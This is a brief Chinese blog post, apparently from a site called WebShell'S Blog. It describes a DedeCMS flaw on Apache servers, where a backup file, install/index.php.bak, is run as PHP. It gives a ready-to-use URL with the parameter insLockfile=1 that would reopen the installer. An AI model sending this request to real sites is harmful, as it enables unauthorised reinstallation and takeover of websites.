利用条件:web server: apache
漏洞原因::apache 不认识bak 直接当php执行.

http://webshell.cc/install/index.php.bak?insLockfile=1

这dedecms死的太冤枉了. apache的原因.

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/4379.html